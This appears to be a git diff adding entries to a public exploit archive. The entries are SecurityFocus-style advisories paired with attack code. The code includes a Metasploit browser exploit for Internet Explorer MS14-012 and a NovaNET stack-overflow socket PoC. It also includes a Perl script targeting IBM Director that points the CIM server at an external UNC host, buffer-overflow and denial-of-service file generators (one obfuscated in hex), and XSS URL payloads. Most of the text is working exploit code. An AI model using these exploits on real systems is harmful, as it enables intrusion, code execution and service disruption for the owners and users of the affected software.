send_request_cgi({ + 'uri' => normalize_uri(target_uri.path, 'recoveryconsole', 'bpl', 'snmpd.php'), + 'vars_get' => get, + 'vars_post' => post, + 'method' => 'POST' + }) + + end +end diff --git a/platforms/unix/remote/32890.txt b/platforms/unix/remote/32890.txt new file mode 100755 index 000000000..b831534d4 --- /dev/null +++ b/platforms/unix/remote/32890.txt @@ -0,0 +1,7 @@ +source: http://www.securityfocus.com/bid/34383/info + +The Apache 'mod_perl' module is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. + +http://www.example.com/perl-status/APR::SockAddr::port/%22%3E%3Cscript%3Ealert(1)%3C/script%3E \ No newline at end of file diff --git a/platforms/windows/dos/32706.txt b/platforms/windows/dos/32706.txt index 959e0c747..21c29c351 100755 --- a/platforms/windows/dos/32706.txt +++ b/platforms/windows/dos/32706.txt @@ -1,4 +1,4 @@ -# Exploit Title: Notepad++ - DSpellCheck plugin[DOS] +# Exploit Title: Notepad++ - DSpellCheck v1.2.12.0 plugin[DOS] # Exploit Author: sajith # Vendor Homepage: http://notepad-plus-plus.org/ # Software Link: http://notepad-plus-plus.org/download/ diff --git a/platforms/windows/dos/32824.pl b/platforms/windows/dos/32824.pl new file mode 100755 index 000000000..1e2963fd9 --- /dev/null +++ b/platforms/windows/dos/32824.pl @@ -0,0 +1,26 @@ +source: http://www.securityfocus.com/bid/33934/info + +Internet Download Manager (IDM) is prone to a remote buffer-overflow vulnerability because the application fails to bounds-check user-supplied data before copying it into an insufficiently sized buffer. + +An attacker may exploit this issue to execute arbitrary code within the context of the affected application. Failed exploit attempts will result in a denial-of-service condition. + +This issue affects IDM 5.15 Build 3; other versions may also be vulnerable. + +#Internet Download Manager v.5.15 Build 3 (4 December) +#Works on Vista +#HellCode Labs || TCC Group || http://tcc.hellcode.net +#Bug was found by "musashi" aka karak0rsan +[musashi@hellcode.net] +#thanx to murderkey +$file="idm_tr.lng"; +$lng= "lang=0x1f Türkçe"; +$buffer = "\x90" x 1160; +$eip = "AAAA"; +$toolbar = "20376="; +$packet=$toolbar.$buffer.$eip; +open(file, '>' . $file); +print file $lng; +print file "\n"; +print file $packet; +close(file); +print "File has created!\n"; diff --git a/platforms/windows/dos/32881.py b/platforms/windows/dos/32881.py new file mode 100755 index 000000000..66ceb7f2a --- /dev/null +++ b/platforms/windows/dos/32881.py @@ -0,0 +1,187 @@ +source: http://www.securityfocus.com/bid/34327/info + +QtWeb browser is prone to a remote denial-of-service vulnerability. + +Attackers can exploit this issue to crash the affected application, denying service to legitimate users. + +QtWeb 2.0 is vulnerable; other versions may also be affected. + + + $S="\x3C\x68\x74\x6D\x6C\x3E\x0D\x0A". + "\x3C\x74\x69\x74\x6C\x65\x3E\x51\x74\x57\x65\x62". + "\x20\x49\x6E\x74\x65\x72\x6E\x65\x74\x20\x42\x72\x6F\x77\x73\x65". + "\x72\x20\x32". "\x2E\x30\x20". + "\x28\x62". "\x75\x69". + "\x6C\x64". "\x20\x30". + "\x34\x33". "\x29\x20". + "\x52\x65". "\x6D\x6F". + "\x74\x65". "\x20\x44". + "\x65\x6E". "\x69\x61". + "\x6C\x20". "\x6F\x66". + "\x20\x53". "\x65\x72". + "\x76\x69". "\x63\x65". + "\x20\x45". "\x78\x70". + "\x6C\x6F". "\x69\x74". "\x3C\x2F". "\x54\x69". + "\x74\x6C". "\x65". "\x3E". "\x0D". "\x0A". "\x3C\x68". + "\x65\x61". "\x64". "\x3E". "\x3C". "\x62". "\x6F\x64". + "\x79\x3E". "\x3C". "\x73". "\x63". "\x72". "\x69\x70". + "\x74\x20". "\x74\x79". + "\x70\x65". "\x3D\x22". + "\x74\x65". "\x78\x74". + "\x2F\x6A". "\x61\x76". + "\x61\x73". "\x63\x72". + "\x69\x70". "\x74\x22". + "\x3E\x0D". "\x0A\x61". + "\x6C\x65". "\x72\x74". + "\x28\x22". "\x51\x74". + "\x57\x65". "\x62\x20". + "\x49\x6E". "\x74\x65". + "\x72\x6E". "\x65\x74". + "\x20\x42". "\x72\x6F". + "\x77\x73". "\x65\x72". + "\x20\x32". "\x2E\x30". + "\x20\x28". "\x62". "\x75". "\x69\x6C". + "\x64\x20". "\x30". "\x34". "\x33\x29". + "\x20\x52". "\x65". "\x6D". "\x6F\x74". + "\x65\x20". "\x44". "\x65". "\x6E\x69". + "\x61\x6C". "\x20". "\x6F". "\x66\x20". + "\x53\x65". "\x72". "\x76". "\x69\x63". + "\x65\x20". "\x45". "\x78". "\x70\x6C". + "\x6F\x69". "\x74". "\x5C". "\x6E\x5C". + "\x6E\x5C". "\x74". "\x5C". "\x74\x5C". + "\x74\x62". "\x79". "\x20". "\x4C\x69". + "\x71\x75". "\x69". "\x64". "\x57\x6F". + "\x72\x6D". "\x20". "\x28". "\x63\x29". + "\x20\x32". "\x30". "\x30". "\x39\x22". + "\x29\x3B". "\x0D\x0A\x66". "\x75\x6E". + "\x63\x74". "\x69\x6F". + "\x6E\x20". "\x64\x6F". + "\x7A\x28". "\x29\x20". + "\x7B\x0D". "\x0A\x74". + "\x69\x74". "\x6C\x65". + + "\x71\x75". "\x69". "\x64". "\x57\x6F". + "\x72\x6D". "\x20". "\x28". "\x63\x29". + "\x20\x32". "\x30". "\x30". "\x39\x22". + "\x29\x3B". "\x0D\x0A\x66". "\x75\x6E". + "\x63\x74". "\x69\x6F". + "\x6E\x20". "\x64\x6F". + "\x7A\x28". "\x29\x20". + "\x7B\x0D". "\x0A\x74". + "\x69\x74". "\x6C\x65". + "\x3D\x22". "\x48\x6F". + "\x74\x20". "\x49\x63". + "\x65\x22". "\x3B\x0D". + "\x0A\x75". "\x72\x6C". + "\x3D\x22". "\x68\x74". + "\x74\x70\x3A". "\x2F\x2F\x77". + "\x77\x77\x2E\x6D\x69\x6C\x77\x30\x72\x6D\x2E\x63\x6F\x6D\x2F". + "\x22\x3B\x0D\x0A\x69\x66\x20\x28\x77\x69\x6E\x64". + "\x6F\x77\x2E\x73\x69\x64\x65\x62";$M= + + + + + "\x61". "\x72" ."\x29". "\x20". + "\x7B". "\x0D" ."\x0A". "\x77". "\x69". + "\x6E"."\x64". "\x6F". "\x77". "\x2E". + "\x73". "\x69". "\x64". "\x65". + "\x62". "\x61". "\x72". "\x2E". + "\x61". "\x64". "\x64". "\x50". + "\x61". "\x6E". "\x65". "\x6C". + "\x28". "\x74". "\x69". "\x74". + "\x6C". "\x65". "\x2C". "\x20". + "\x75". "\x72". "\x6C". "\x2C". + "\x22". "\x22". "\x29". "\x3B". + "\x0D". "\x0A"."\x7D". + "\x20". "\x65". "\x6C". + "\x73"; + + $I="\x65\x20\x69\x66\x28\x20\x77". + "\x69\x6E\x64\x6F\x77". + "\x2E\x65\x78\x74\x65\x72\x6E". + "\x61\x6C\x20\x29\x20". ############## + "\x7B\x0D\x0A\x77\x69\x6E\x64". ## # + "\x6F\x77\x2E\x65"."\x78". ###### + "\x74\x65\x72\x6E\x61". ########## _ _ _ + "\x6C\x2E\x41\x64\x64\x46\x61\x76\x6F\x72\x69". #==---- #==---- #==---- + "\x74\x65\x28\x20\x75". + "\x72\x6C\x2C\x20\x74". ##===* + "\x69\x74\x6C\x65\x29\x3B\x0D". + "\x0A\x7D\x20\x65\x6C". + "\x73\x65\x20\x69\x66\x28\x77". + "\x69\x6E\x64\x6F\x77". + "\x2E\x6F\x70\x65\x72\x61\x20"; + #################### + + + $L="\x26\x26\x20\x77\x69\x6E\x64\x6F\x77\x2E". + "\x70\x72\x69\x6E\x74\x29\x20\x7B". + "\x20\x0D\x0A\x72\x65\x74". + "\x75\x72\x6E\x20". + "\x28\x74\x72". + "\x75\x65". + "\x29". + "\x3B". + "\x20\x7D". + "\x7D\x0D\x0A". + "\x76\x61\x72\x20". + "\x61\x73\x6B\x20\x3D\x20". + "\x63\x6F\x6E\x66\x69\x72\x6D\x28". + "\x22\x50\x72\x65\x73\x73\x20\x4F\x4B\x20". + "\x74\x6F\x20\x73\x74\x61\x72\x74". + "\x20\x74\x68\x65\x20\x44". + "\x6F\x53\x2E\x5C". + "\x6E\x50\x72". + "\x65\x73". + "\x73". + "\x20". + "\x4E\x6F". + "\x20\x74\x6F". + "\x20\x64\x6F\x64". + "\x67\x65\x20\x74\x68\x65". + "\x20\x44\x6F\x53\x2E\x22\x29\x3B". + "\x0D\x0A\x69\x66\x20\x28\x61\x73\x6B\x20". + "\x3D\x3D\x20\x74\x72\x75\x65\x29". + "\x20\x7B\x20\x0D\x0A\x66". + "\x6F\x72\x20\x28". + "\x78\x3D\x30". + "\x3B\x20". + "\x78". + "\x3C". + "\x78\x2B". + "\x31\x3B\x20". + "\x78\x2B\x2B\x29". + "\x20\x64\x6F\x7A\x28\x29". + "\x3B\x0D\x0A\x7D\x20\x65\x6C\x73". + "\x65\x09\x7B\x20\x61\x6C\x65\x72\x74\x28". + "\x22\x4F\x6B\x20\x3A\x28\x22\x29". + "\x3B\x0D\x0A\x77\x69\x6E". + "\x64\x6F\x77\x2E". + "\x6C\x6F\x63". + "\x61\x74". + "\x69". + "\x6F". + "\x6E\x2E". + "\x68\x72\x65". + "\x66\x20\x3D\x20". + "\x22\x68\x74\x74\x70\x3A". + "\x2F\x2F\x77\x77\x77\x2E\x71\x74". + "\x77\x65\x62\x2E\x6E\x65\x74\x2F\x22\x3B"; + ######### + $E="\x0D\x0A\x7D\x20". + "\x3C\x2F\x73\x63". + "\x72\x69\x70\x74". + "\x3E\x3C\x2F\x62". + "\x6F\x64\x79\x3E". + "\x3C\x2F\x68\x65". + "\x61\x64\x3E\x3C". + "\x2F\x68\x74\x6D". + "\x6C\x3E";#####____ + +my $file = "Smile.html"; +my $fun = $S.$M.$I.$L.$E; +open (mrowdiuqil, ">./$file") || die "\nMffff... $!\n"; +print mrowdiuqil "$fun"; +close (mrowdiuqil); +print "\n[+] File $file created with funny potion\!\n\n"; diff --git a/platforms/windows/dos/32902.py b/platforms/windows/dos/32902.py new file mode 100755 index 000000000..9793a321d --- /dev/null +++ b/platforms/windows/dos/32902.py @@ -0,0 +1,29 @@ +source: http://www.securityfocus.com/bid/34478/info + +Microsoft Internet Explorer is prone to a remote denial-of-service vulnerability. + +Successful exploits can allow attackers to hang the affected browser, resulting in denial-of-service conditions. + +#/usr/bin/env python +import sys +import random + +CHAR_SET = [chr(x) for x in range(0x20)] +CHAR_SET += [chr(x) for x in range(128, 256)] + +def send_file(): + l = 800000 + 4096 + print "Content-Type: text/plain" + print "Content-Length: %d" % l + print "Cache-Control: no-cache, no-store, must-revalidate" + # this is not standardized, but use it anyway + print "Pragma: no-cache" + print "" + # bypass IE download dialog + sys.stdout.write("a" * 4096) + # print junks + for i in xrange(l): + sys.stdout.write(random.choice(CHAR_SET)) + sys.exit() + +send_file() diff --git a/platforms/windows/local/24872.txt b/platforms/windows/local/24872.txt index 8b8168b6b..b2b9d6c98 100755 --- a/platforms/windows/local/24872.txt +++ b/platforms/windows/local/24872.txt @@ -1,3 +1,5 @@ +#E-DB Note: Vuln still in 6.0.3410 as well as 'Photodex ProShow Gold' + Inshell Security Advisory http://www.inshell.net diff --git a/platforms/windows/local/32771.txt b/platforms/windows/local/32771.txt new file mode 100755 index 000000000..b796df61d --- /dev/null +++ b/platforms/windows/local/32771.txt @@ -0,0 +1,12 @@ +source: http://www.securityfocus.com/bid/33561/info + +Multiple Kaspersky products are prone to a local privilege-escalation vulnerability because the applications fail to perform adequate boundary checks on user-supplied data. + +A local attacker can exploit this issue to execute arbitrary code with SYSTEM-level privileges. Successfully exploiting this issue will result in the complete compromise of affected computers. Failed exploit attempts will result in a denial-of-service condition. + +This issue affects versions in the following product groups: + +Kaspersky AV 2008 +Kaspersky AV for WorkStations 6.0 + +http://www.exploit-db.com/sploits/32771.zip \ No newline at end of file diff --git a/platforms/windows/local/32845.pl b/platforms/windows/local/32845.pl new file mode 100755 index 000000000..3f64bf6f4 --- /dev/null +++ b/platforms/windows/local/32845.pl @@ -0,0 +1,56 @@ +source: http://www.securityfocus.com/bid/34065/info + +IBM Director is prone to a privilege-escalation vulnerability that affects the CIM server. + +Attackers can leverage this issue to execute arbitrary code with elevated privileges in the context of the CIM server process. + +Versions prior to IBM Director 5.20.3 Service Update 2 are affected. + +use IO::Socket; +#1st argument: target host +my $sock = IO::Socket::INET->new(PeerAddr => $ARGV[0], + PeerPort => "6988", + Proto => 'tcp'); +$payload = +qq{ + + + + + + + + Sample CIM_AlertIndication indication + + + 1 + + + 3 + + + 2 + + + 20010515104354.000000:000 + + + + + + +}; +$req = +"M-POST /CIMListener/\\\\isowarez.de\\director\\wootwoot HTTP/1.1\r\n" +."Host: $ARGV[0]\r\n" +."Content-Type: application/xml; charset=utf-8\r\n" +."Content-Length: ". length($payload) ."\r\n" +."Man: http://www.dmtf.org/cim/mapping/http/v1.0 ; ns=40\r\n" +."CIMOperation: MethodCall\r\n" +."CIMExport: MethodRequest\r\n" +."CIMExportMethod: ExportIndication\r\n\r\n"; +print $sock $req . $payload; + +while(<$sock>) { + print; +} diff --git a/platforms/windows/local/32850.txt b/platforms/windows/local/32850.txt new file mode 100755 index 000000000..d3fe7d44a --- /dev/null +++ b/platforms/windows/local/32850.txt @@ -0,0 +1,15 @@ +source: http://www.securityfocus.com/bid/34103/info + +Multiple SlySoft products are prone to multiple buffer-overflow vulnerabilities because they fail to adequately validate user-supplied input. + +A local attacker can exploit these issues to execute arbitrary code with SYSTEM-level privileges. Failed attacks will result in denial-of-service conditions. + +The following applications are vulnerable: + +SlySoft AnyDVD 6.5.2.2 +SlySoft AnyDVD HD 6.5.2.2 +SlySoft Virtual CloneDrive 5.4.2.3 +SlySoft CloneDVD 2.9.2.0 +SlySoft CloneCD 5.3.1.3 + +http://www.exploit-db.com/sploits/32850.zip \ No newline at end of file diff --git a/platforms/windows/local/32891.txt b/platforms/windows/local/32891.txt new file mode 100755 index 000000000..0927eb3ba --- /dev/null +++ b/platforms/windows/local/32891.txt @@ -0,0 +1,14 @@ +source: http://www.securityfocus.com/bid/34442/info + +Microsoft Windows is prone to a privilege-escalation vulnerability. + +Successful exploits may allow attackers to elevate their privileges to LocalSystem, which would facilitate the complete compromise of affected computers. + +The issue affects the following: + +Windows XP SP2 +Windows Server 2003 +Windows Vista +Windows Server 2008 + +http://www.exploit-db.com/sploits/32891.zip \ No newline at end of file diff --git a/platforms/windows/local/32892.txt b/platforms/windows/local/32892.txt new file mode 100755 index 000000000..8fea298a2 --- /dev/null +++ b/platforms/windows/local/32892.txt @@ -0,0 +1,12 @@ +source: http://www.securityfocus.com/bid/34443/info + +Microsoft Windows is prone to a privilege-escalation vulnerability. + +Successful exploits may allow attackers to elevate their privileges to LocalSystem, which would facilitate the complete compromise of affected computers. + +The issue affects the following: + +Windows XP SP2 +Windows Server 2003 + +http://www.exploit-db.com/sploits/32892.zip \ No newline at end of file diff --git a/platforms/windows/local/32893.txt b/platforms/windows/local/32893.txt new file mode 100755 index 000000000..fa9b68610 --- /dev/null +++ b/platforms/windows/local/32893.txt @@ -0,0 +1,12 @@ +source: http://www.securityfocus.com/bid/34444/info + +Microsoft Windows is prone to a privilege-escalation vulnerability. + +Successful exploits may allow attackers to elevate their privileges to LocalSystem, which would facilitate the complete compromise of affected computers. + +The issue affects the following: + +Windows Vista +Windows Server 2008 + +http://www.exploit-db.com/sploits/32893.zip \ No newline at end of file diff --git a/platforms/windows/remote/32826.html b/platforms/windows/remote/32826.html new file mode 100755 index 000000000..a2c6c025d --- /dev/null +++ b/platforms/windows/remote/32826.html @@ -0,0 +1,5 @@ +source: http://www.securityfocus.com/bid/33942/info + +iDefense COMRaider ActiveX control is prone to a vulnerability that lets attackers overwrite arbitrary local files on the victim's computer in the context of the vulnerable application using the ActiveX control (typically Internet Explorer). + + \ No newline at end of file diff --git a/platforms/windows/remote/32832.c b/platforms/windows/remote/32832.c new file mode 100755 index 000000000..31683edfb --- /dev/null +++ b/platforms/windows/remote/32832.c @@ -0,0 +1,97 @@ +source: http://www.securityfocus.com/bid/33954/info + + +NovaStor NovaNET is prone to a stack-based buffer-overflow vulnerability because it fails to adequately bounds-check user-supplied data before copying it to an insufficiently sized buffer. + +Attackers can exploit this issue to execute arbitrary code within the context of the affected application or cause a denial-of-service condition. + +NovaNET 12 is vulnerable; other versions may also be affected. + +import os +import sys +import socket +#NovaNet 12 PoC by AbdulAziz Hariri. + +request1_1 =("\x54\x84\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x92\x00\x00\x00"+ +"\x03\x3f\xfb\x76\x08\x20\x80\x00\x7f\xe3\x08\x88\x57\x3b\x77\x80"+ +"\x01\x00\x00\x00\xc0\xa8\x01\x42\x00\x00\x00\x00\x00\x00\x00\x00"+ +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+ +"\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+ +"\x00\x00\x00\x00\x30\x58\x39\x30\x00\x63\x88\x77\xfe\xff\xff\xff"+ +"\x1b\x3f\xfb\x76\x6a\x31\x41\x73\xb0\x03\x00\x00\xff\xff\x00\x00"+ +"\x06\x10\x00\x44\x74\x62\x3a\x20\x43\x6f\x6e\x74\x65\x78\x74\x00\xd8\xc1\x08\x10\xb0\x03\x00\x00\xff\xff\x00\x00\x06\x10\x00\x00"+ +"\x80\xfa") + +Request2_1=("\x51\x84\x00\x00\x02\x02\x02\x32\x18\x00\x00\x00\xa4\x01\x00\x00"+ +"\x00\x00\x00\x00") + +Request2_2=("\x00\x00\x00\x00\x00\x00\x00"+ +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+ +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+ +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+ +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+ +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+ +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+ +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+ +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+ +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+ +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+ +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+ +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+ +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+ +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+ +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+ +"\x00\x00\x00\x00\x4d\x4c\x4d\x4c\x4d\x44\x4f\x4c\x4f\x44\x4f\x44"+ +"\x49\x4c\x49\x44\x49\x4c\x43\x4c\x00\x00\x00\x00\x00\x00\x00\x00"+ +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+ +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+ +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+ +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+ +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+ +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+ +"\x00\x00\x00\x00\x01\x10\x00\x00\x1f\x93\xf0\x48\x67\x60\x1e\x00"+ +"\xd1\xc4\x4f\x00") + +if len(sys.argv) != 2: +print "[x] Usage: IP" +sys.exit +hostname = sys.argv[1] +buff3r = ("\x41"*77) + "\x44"*156 + ("\x43"*75) + "\x0d\xf0\x0d\xf0" + +logno = Request2_1 + buff3r + Request2_2 + +s = socket.socket(socket.AF_INET,socket.SOCK_STREAM) +try: +s.connect((hostname,3817)) +except socket.error, (value,msg): +if s: +s.close() +print "[x] Error: %s.\n" % msg +sys.exit(1) +else: +print "[x] Connected to: %s." % hostname + +print "[x] Sending initial request.." +try: +s.send(request1_1) +except socket.error, (value,msg): +if s: +s.close() +print "[x] Error: %s.\n" % msg +sys.exit(1) +else: +print "[x] Sent!" + +print "[x] Sending Evil Buffer.." + +try: +s.send(logno) +except socket.error, (value,msg): +if s: +s.close() +print "[x] Error: %s.\n" % msg +sys.exit(1) +else: +print "[x] Sent!" + +print "[x] End of Demo exploit." diff --git a/platforms/windows/remote/32851.html b/platforms/windows/remote/32851.html new file mode 100755 index 000000000..044af63f9 --- /dev/null +++ b/platforms/windows/remote/32851.html @@ -0,0 +1,111 @@ + + + + + + + + + + + \ No newline at end of file diff --git a/platforms/windows/remote/32879.html b/platforms/windows/remote/32879.html new file mode 100755 index 000000000..74826449e --- /dev/null +++ b/platforms/windows/remote/32879.html @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/34319/info + +SAP MaxDB is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data. + +An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. + +http://example.com:9999/webdbm?Event=DBM_LOGON&Action=VIEW&Server=&Database=[XSS] +http://example.com:9999/webdbm?Event=DBM_LOGON&Action=VIEW&Server=&User=[XSS] +http://example.com:9999/webdbm?Event=DBM_LOGON&Action=VIEW&Server=&Database=&User=&Password=[XSS] \ No newline at end of file diff --git a/platforms/windows/remote/32904.rb b/platforms/windows/remote/32904.rb new file mode 100755 index 000000000..561b3c5b9 --- /dev/null +++ b/platforms/windows/remote/32904.rb @@ -0,0 +1,200 @@ +## +# This module requires Metasploit: http//metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = NormalRanking + + include Msf::Exploit::Remote::BrowserExploitServer + + def initialize(info={}) + super(update_info(info, + 'Name' => "MS14-012 Microsoft Internet Explorer CMarkup Use-After-Free", + 'Description' => %q{ + This module exploits an use after free condition on Internet Explorer as used in the wild + on the "Operation SnowMan" in February 2014. The module uses Flash Player 12 in order to + bypass ASLR and finally DEP. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Unknown', # Vulnerability discovery and Exploit in the wild + 'Jean-Jamil Khalife', # Exploit + 'juan vazquez' # Metasploit module + ], + 'References' => + [ + [ 'CVE', '2014-0322' ], + [ 'MSB', 'MS14-012' ], + [ 'BID', '65551' ], + [ 'URL', 'http://www.fireeye.com/blog/technical/cyber-exploits/2014/02/operation-snowman-deputydog-actor-compromises-us-veterans-of-foreign-wars-website.html'], + [ 'URL', 'http://hdwsec.fr/blog/CVE-2014-0322.html' ] + ], + 'Platform' => 'win', + 'Arch' => ARCH_X86, + 'Payload' => + { + 'Space' => 960, + 'DisableNops' => true, + 'PrependEncoder' => stack_adjust + }, + 'BrowserRequirements' => + { + :source => /script|headers/i, + :os_name => Msf::OperatingSystems::WINDOWS, + :os_flavor => Msf::OperatingSystems::WindowsVersions::SEVEN, + :ua_name => Msf::HttpClients::IE, + :ua_ver => '10.0', + :mshtml_build => lambda { |ver| ver.to_i < 16843 }, + :flash => /^12\./ + }, + 'DefaultOptions' => + { + 'InitialAutoRunScript' => 'migrate -f', + 'Retries' => false + }, + 'Targets' => + [ + [ 'Windows 7 SP1 / IE 10 / FP 12', { } ], + ], + 'Privileged' => false, + 'DisclosureDate' => "Feb 13 2014", + 'DefaultTarget' => 0)) + + end + + def stack_adjust + adjust = "\x64\xa1\x18\x00\x00\x00" # mov eax, fs:[0x18 # get teb + adjust << "\x83\xC0\x08" # add eax, byte 8 # get pointer to stacklimit + adjust << "\x8b\x20" # mov esp, [eax] # put esp at stacklimit + adjust << "\x81\xC4\x30\xF8\xFF\xFF" # add esp, -2000 # plus a little offset + + adjust + end + + def create_swf + path = ::File.join( Msf::Config.data_directory, "exploits", "CVE-2014-0322", "AsXploit.swf" ) + fd = ::File.open( path, "rb" ) + swf = fd.read(fd.stat.size) + fd.close + return swf + end + + def exploit + @swf = create_swf + super + end + + def on_request_uri(cli, request) + print_status("Request: #{request.uri}") + + if request.uri =~ /\.swf$/ + print_status("Sending SWF...") + send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Pragma' => 'no-cache'}) + return + end + + super + end + + def on_request_exploit(cli, request, target_info) + print_status("Sending HTML...") + send_exploit_html(cli, exploit_template(cli, target_info)) + end + + def exploit_template(cli, target_info) + + flash_payload = "" + get_payload(cli,target_info).unpack("V*").each do |i| + flash_payload << "0x#{i.to_s(16)}," + end + flash_payload.gsub!(/,$/, "") + + html_template = %Q| + + + + + + + + + + + | + + return html_template, binding() + end + +end \ No newline at end of file